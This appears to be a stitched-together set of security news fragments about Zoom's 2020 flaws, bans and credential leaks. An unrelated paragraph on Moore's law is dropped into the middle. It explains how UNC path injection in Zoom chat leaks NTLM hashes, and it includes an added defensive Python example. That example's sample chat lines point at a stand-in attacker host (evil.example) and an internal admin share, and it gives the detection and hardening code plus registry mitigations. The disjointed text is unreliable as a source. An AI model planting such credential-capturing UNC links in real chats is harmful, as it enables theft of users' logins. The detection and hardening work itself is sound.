Security News
Researchers have found a database of Zoom video conferencing credentials whose entries range from just an email address and password to records that also include meeting IDs, names and host keys. The richer entries are possible because Zoom users are often lax about protecting those details - and the set may be only a small subset of a larger collection of credentials that was not made available to others.
Researchers have uncovered a database shared on an underground forum containing more than 2,300 compromised Zoom credentials. Etay Maor, chief security officer at IntSights, told Threatpost that the source of the credentials is unknown, but that the relatively small number suggests they did not come from a breach of Zoom's own database (credential stuffing from other leaks is the more likely origin for a set that size).
That spike in users also exposed a growing list of security flaws: Zoom-bombing trolls have emerged, user email addresses and photos have leaked, calls are not end-to-end encrypted, and flaws found in the Zoom installer allow an attacker to gain root access on computers that run a malicious version of it. These security flaws have prompted some organizations, companies, governments, government agencies and schools to ban Zoom or restrict its use.
As it faces a major lawsuit, Zoom is taking a significant step to bolster its security and privacy efforts by recruiting an industry heavy-hitter - former Facebook CISO Alex Stamos - as an outside adviser. Zoom now says that it aims to clean up its issues both on the product side and through a high-level executive approach, Zoom founder Eric Yuan said in a blog post published Wednesday.
Zoom has promised to improve security and privacy, but an increasing number of organizations have decided to ban the video conferencing application over security concerns. Stamos will help Zoom implement better security controls and practices.
In 1965, Gordon Moore published a short informal paper, Cramming more components onto integrated circuits. Based on not much more than a few data points and his knowledge of silicon chip development - he was head of R&D at Fairchild Semiconductor, the company that was to seed Silicon Valley - he predicted that for the next decade the number of components per unit area could double every year.
In an unprecedented and hotly debated move, the New York City Department of Education banned the use of Zoom, writing in an internal memo on April 3 that teachers were no longer allowed to use the platform at all. "We know the transition away from Zoom will take time for many educators and we will support them. We know maintaining continuity of teaching means it won't happen overnight. Less than 2 weeks ago, our heroic educators began transforming instruction for 1.1M kids, bringing the nation's largest public school system online. They rose to this challenge with grace, and our whole city is grateful for how they've learned to teach and lead remotely," Schools Chancellor Richard Carranza wrote.
Tim Keeler, CEO of Remediant, a security consultant and penetration tester, explained how Zoom became a target. Attackers, he said, "tricked users into disclosing usernames and password hashes by clicking on links in a Zoom session chat window," an attack that "took advantage of the Universal Naming Convention path injection vulnerability in the Zoom Windows client."
Such attacks are possible because Zoom for Windows converts UNC paths (\\host\share\file) received in personal or group chat messages into clickable hyperlinks, even though such a path points at a remote SMB server rather than a web page. Researcher Matthew Hickey confirmed, and Mohamed Baset demonstrated, the first attack scenario, which relies on the SMB relay technique: when a Windows machine is asked to open a file hosted on a remote SMB server, it automatically attempts NTLM authentication to that server, sending the user's login name and an NTLM challenge-response. An attacker-controlled server captures that response and can either crack it offline to recover the password or relay it to another service that accepts NTLM.
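The following is an added example, not Zoom's code or any of the researchers' tooling, showing the two halves of the issue described above: a chat renderer that turns UNC paths into links (the weak behaviour) beside one that only links http(s) URLs, plus a detector that flags UNC paths in inbound chat text so a defender can alert on them. The chat lines, host names and function names (find_unc_paths, linkify_unsafe, linkify_safe) are constructed for this example.

```python
"""
Added example: why linkifying UNC paths in chat leaks NTLM credentials,
and the hardened renderer. Not Zoom's code; sample chat lines are constructed.
"""
import html
import ipaddress
import re
from dataclasses import dataclass

# A UNC path: two backslashes, a host, a share name, and an optional tail.
UNC_RE = re.compile(r"\\\\([A-Za-z0-9][A-Za-z0-9._\-]*)\\([^\s\\]+)((?:\\[^\s\\]*)*)")
# Anything with a URL scheme, e.g. https://... or file://... (the latter also
# makes Windows open an SMB session when the authority is a remote host).
URL_RE = re.compile(r"\b([a-zA-Z][a-zA-Z0-9+.\-]*)://[^\s<>]+")
# Schemes the hardened renderer is willing to turn into <a href>.
SAFE_SCHEMES = {"http", "https"}

# Constructed sample chat messages, one of them from an attacker.
CHAT = [
    "meeting notes are at https://intranet.example/notes",
    r"grab the slides: \\evil.example\share\deck.pptx",
    r"or from the build box \\10.0.0.5\c$\out\deck.pptx",
    "mirror: file://evil.example/share/deck.pptx",
]


@dataclass(frozen=True)
class UncHit:
    raw: str
    host: str
    share: str
    host_kind: str  # "ip-literal" or "hostname"


def _host_kind(host: str) -> str:
    try:
        ipaddress.ip_address(host)
        return "ip-literal"
    except ValueError:
        return "hostname"


def find_unc_paths(text: str) -> list[UncHit]:
    """Detection: every UNC path in inbound chat text, whatever the host.
    A relay can sit on an internal host, so private addresses are reported too."""
    return [
        UncHit(raw=m.group(0), host=m.group(1), share=m.group(2),
               host_kind=_host_kind(m.group(1)))
        for m in UNC_RE.finditer(text)
    ]


def _render(text: str, allow) -> str:
    """Escape the message and wrap only the spans that `allow` accepts in <a>."""
    spans = [(m.start(), m.end(), "url", m) for m in URL_RE.finditer(text)]
    spans += [(m.start(), m.end(), "unc", m) for m in UNC_RE.finditer(text)]
    spans.sort(key=lambda s: s[0])
    out, pos = [], 0
    for start, end, kind, m in spans:
        if start < pos:  # overlapping match already consumed
            continue
        out.append(html.escape(text[pos:start]))
        target = html.escape(m.group(0))
        if allow(kind, m):
            out.append(f'<a href="{target}">{target}</a>')
        else:
            out.append(target)  # left as inert text, never a clickable target
        pos = end
    out.append(html.escape(text[pos:]))
    return "".join(out)


def linkify_unsafe(text: str) -> str:
    """Weak behaviour: every URL and every UNC path becomes a clickable link.
    One click on \\\\evil.example\\share makes Windows authenticate to
    evil.example over SMB and hand it the user's NTLM challenge-response."""
    return _render(text, lambda kind, m: True)


def linkify_safe(text: str) -> str:
    """Hardened behaviour: only http(s) URLs are linked; UNC paths and
    file:// URLs are rendered as plain text."""
    return _render(text, lambda kind, m: kind == "url" and m.group(1).lower() in SAFE_SCHEMES)


if __name__ == "__main__":
    for line in CHAT:
        for hit in find_unc_paths(line):
            print(f"ALERT unc path to {hit.host} ({hit.host_kind}) share={hit.share}")
        print("unsafe:", linkify_unsafe(line))
        print("safe:  ", linkify_safe(line))
```

The client-side fix is the `linkify_safe` rule: never turn a UNC path or a non-http scheme into a clickable target. Independently of the client, Windows administrators can stop the credential from leaving the machine at all by setting the Group Policy "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" to Deny all (registry value RestrictSendingNTLMTraffic = 2 under HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0) and by blocking outbound TCP 445 and 139 to the internet at the perimeter firewall, which defeats the remote server in this scenario but not a relay host inside the network.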
Over the past few weeks, use of the Zoom video conferencing software has exploded since it emerged as the platform of choice for everything from cabinet meetings to yoga classes amid the ongoing coronavirus outbreak, as working from home became the new normal. Zoom also came under scrutiny for its "attendee attention tracking" feature, which, when enabled, lets a host see whether participants have clicked away from the main Zoom window during a call.